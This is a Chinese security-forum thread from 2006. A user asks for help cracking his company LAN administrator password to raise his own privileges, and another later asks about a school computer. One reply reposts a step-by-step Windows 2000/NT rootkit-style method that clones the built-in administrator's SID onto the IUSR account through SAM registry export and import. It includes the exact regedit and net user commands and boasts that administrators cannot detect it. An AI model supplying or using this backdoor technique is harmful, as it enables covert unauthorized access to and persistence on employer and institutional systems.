|
![]() | 作者: jones [jones8565]
![]() |
登录 |
各位高人: 有谁能帮助我破解公司局域网管理员的密码?用什么方法?或用什么软件可以?我在公司电脑上的权限太低了,都不能安装软件,现在想破解管理员密码,将权限改过来,请各位大侠帮助.谢谢! ![]() ![]() ![]() |
地主 发表时间: 06-03-16 02:24 |
![]() | 回复: foxjinlin [foxjinlin] ![]() |
登录 |
你们局域网用了管理软件么,用了的话,用的是什么管理软件? |
B1层 发表时间: 06-03-16 16:38 |
![]() | 回复: abalone [abalone] ![]() |
登录 |
如果什么也没用! 局域网内访问要密码! 如何破解!? 感谢! ![]() ![]() [此贴被 飘(abalone) 在 03月16日21时40分 编辑过] |
B2层 发表时间: 06-03-16 21:39 |
![]() | 回复: pady [pady] ![]() |
登录 |
本地提权 |
B3层 发表时间: 06-03-19 12:17 |
![]() | 回复: ui_ul [ui_ul] ![]() |
登录 |
经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的 用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit 的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。 首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的 500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在 这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号, 所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 S erver。 运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 H ttp://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行 regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文 件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F 4"修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安 装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg 文件中的"1F4"修改为"3E9"后执行 regedit /s adam.reg 导入该Reg文件 然后运行 net user IUSR_MachineName Sometips 修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好) OK,大功告成... 这样,我们拥有和默认管理员一样的桌面、一样的Profile..... 而且,当我们运行 net localgroup administrators 时,看看结果: C:\>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the compu ter/domain Members ------------------------------------------------------------------------------- Administrator The command completed successfully. 再看看USER2SID的输出结果: C:\>user2sid Administrator S-1-5-21-1004336348-1078145449-854245398-500 Number of subauthorities is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser C:\>user2sid iusr_machinename S-1-5-21-1004336348-1078145449-854245398-1001 Number of subauthorities is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser 我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可 以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IU SR_MachineName为其他的名字吧) sam下可没有一点内容 转贴! |
B4层 发表时间: 06-04-18 11:22 |
![]() | 回复: cainiaoji [cainiaoji] ![]() |
登录 |
那学校XP系统的管理员权限怎么破解呀! |
B5层 发表时间: 06-10-07 06:06 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号